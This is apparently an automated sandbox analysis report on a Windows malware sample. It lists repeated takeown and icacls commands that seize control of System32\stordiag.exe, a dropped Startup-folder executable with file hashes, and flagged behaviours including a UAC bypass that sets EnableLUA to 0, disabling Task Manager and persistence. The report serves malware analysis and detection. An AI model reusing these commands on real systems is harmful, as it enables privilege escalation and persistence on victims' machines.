"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "120839374-367117722-2060742768144387948214353184922030831895-1007722331-1868571432"

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "976119717-1221544081721948058485745835299664124569137448167989005-979890006"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1392364366859130352248393155-2584578047116125181051970474-2039034854-655957556"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1940624636-392435160-550185710129012166-54347679635329101569310007131860601"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-108151398153832787-992284616-9197500151709581483-1192210948-8865977141884298329"

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

Network

N/A

Files

memory/2084-0-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

memory/2084-1-0x0000000000F60000-0x0000000000F88000-memory.dmp

memory/2084-2-0x000007FEF55A0000-0x000007FEF5F8C000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AuF8OrQFZQe.exe

MD5 6ee7bee8dd7e1c5a8897f58c33b9fac3
SHA1 45f5551a38ff1c0c60ed63be5dca267bb65238e8
SHA256 080d787304db0ec177e6a086ac318092723486d558d36d66f505ea821f5842c5
SHA512 c1a1e90b4dadedd8b031e4b6fdb249d41ababe62cf4101dd018e8fab1008d207b7eba1beb54163d37ced355568bf757186bb152bad004a3cbdac3232ecab0304

memory/2084-1136-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

memory/2084-1269-0x000007FEF55A0000-0x000007FEF5F8C000-memory.dmp

C:\Windows\System32\stordiag.exe

MD5 749c23800de277b79a37e6717d33c05a
SHA1 5efe3f5c2f981c486350b40916459ec3dc05eb70
SHA256 4cdce1f56a6d63e7c35d9c32265f131143328720d04c89ab821caf2f63ab4c93
SHA512 97814d9c043938f7987e75e55e107210f498bdf631fe3eff0673297b02cebab70e82d3fab448c83caf9c0475173be3c2c67b956d448208ebe71a5b466f74f7ed

C:\Windows\System32\stordiag.exe

MD5 423a2bef39ce629cd3bb01e21978153c
SHA1 e35404c03da1fa3b3eadd75c7448ed0971d0e375
SHA256 aba4537a415911a98134678f808e26b1a862bbec916dc6f53de2fd1a5e3df3a1
SHA512 132572dc3cde2524f9a3035d312dcee6dafc314969c2cbf4112ee1f7c9e83416a4ba0f16fbc95b1a4b1429370b25067a25847bff65a56cbb7c28c3a6d9a0defe

C:\Windows\System32\stordiag.exe

MD5 2fd5a7ae68af92fb86cf43d57d1997cc
SHA1 4558bdf09fe9b33d24cfb08ede5c63b40804e42c
SHA256 880eceb309f2ca7a9ea12c3bb0c17d3022aace9343d89e98580755de6645805f
SHA512 7f8532db6817bbd6e6dacc7d270069d43198dc3f874c453ae2281fcc441c934a68e6ce85177ab6bf7544a356bdf3ea08636eebb39fda56b22691a0b8c449660e

C:\Windows\System32\stordiag.exe

MD5 64fd98eb25246602d933e54ba9b454a2
SHA1 bb628dfe2c980a9ee00f7c1998374297d9ac2edd
SHA256 bd3d8b57728d50550ae88d8b12de79b14cf0b7ceffea1c18c17b1df2da240bf3
SHA512 0482760618600284dd5223dcb5b149d19655a5e2152bdb4306b032a5a6303a87fea767cb3e3dd04946df418e622b0744fb65eb99dc98669b96d2429c13f02ddf

C:\Windows\System32\stordiag.exe

MD5 ba66f706be8f7adbcffe87f740255b80
SHA1 6495fda80f1d1b5d8b5299128d2d75c5a079e437
SHA256 e83d3717a2237dcaba64b38240cafc500c30978549d60e44e1adf7de8e1defac
SHA512 7c771787e784564c40e23deafa3163576d2c538efae91ca192baccf53b91badc7c76293917d34357e8446fdf17628efd3a3aeea7502fa5f602240c8d6e6fd9a9

C:\Windows\System32\stordiag.exe

MD5 c3c70582949bd5eb04094d377a177421
SHA1 3f7369db4cb4340c72d850f61b66342e9f72fc1d
SHA256 d9926d8e5a4210dd00008ec982b87f8c2bd83003fb2e836c619be311a998da43
SHA512 bf8ed67d211063f1f52ccaa6621653ba4f17de2eff41f44da22b6b10e09cb65b8e7ce27d97673be5d5e9e3f441e565ee444755fc39bd942ee8b337ac8520dfe8

C:\Windows\System32\stordiag.exe

MD5 9add874e18dd6ac82b62d05931f8ba8e
SHA1 7f791f2a04c200c1162b71ca8cfb0f1ab81e5b3e
SHA256 9cf29940244bcabcd0089de4362ddc5d99012e689d97bcc2517df8e946b6bab7
SHA512 b7eb0ebd5acdc67755884442b139d163ac384613733cee8ce1394d01ebd51e55857ed4f2c196d3cca02020af7895eb1ec7e29667bb5998f7a5d519c22b3c76a6

C:\Windows\System32\stordiag.exe

MD5 ee121d7d851e08c3db7d23905309a4c4
SHA1 896507fa433fc80fb9d1e406ec3c206c009df779
SHA256 5feb5a59fe19ed73e9c3902cbf748596905a50801fce620e34b76e6bf061a9bb
SHA512 e50397262b3a665bdfa85a14c627666c295d0a78c4ce798db92ffc91143fc61a38f09dadc4188aaa8f5f26899befdec0c6d49c72f0760beab7b4c7cbea65f37c

C:\Windows\System32\stordiag.exe

MD5 89924677e9bfd8083448419a882950c6
SHA1 83a560187d24457003403a70b133906dd2169cd4
SHA256 7c41eabecc24e523c471266cdb14a96631f0e1836a53f29e5b59d9a4b7a0e3b9
SHA512 84b68a9ba11a6b39fff6d654f09e17ff72f7115605863475880ffd777aceacb2149c2f9b0254b14f2450c837ad33513d91106663def4990acee314691be9b5c9

C:\Windows\System32\stordiag.exe

MD5 6324d8a6e98fb140f84d563824be6df0
SHA1 b4997cb942431b3a38c8664fd065f15628e4498d
SHA256 4e3fdb4f870587ce7746674a0efb81b7d3dc20d0ceed4dd75e72af4b8c9b5cde
SHA512 fbe4abb95d7ee8bcc605d13b1d132ca8760ffb1983b32ef666a6ca09c409a8f20dff8498deef0006ab40704af4e9f03daf72e71759fa0deac2526b14c2ff6f88

C:\Windows\System32\stordiag.exe

MD5 6686f74b2d4981502a570455a7fd32bb
SHA1 38625e63f164ab074a3aaba537f2cf76a8ab3f93
SHA256 12ab12db4abad721a3be04c0be4db329e1aa905e4032c62da8e138f1af203477
SHA512 ee3b1dee40849b04f3eb319c36861ec993aa4ea313978c16138bdf6209dfd4d3578aa41de7feeada52e58bd9a08fbf3f3292770a9522bd7bae79f30ec27f5ae0

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-10 15:42

Reported

2024-10-10 15:45

Platform

win10v2004-20241007-en

Max time kernel

124s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
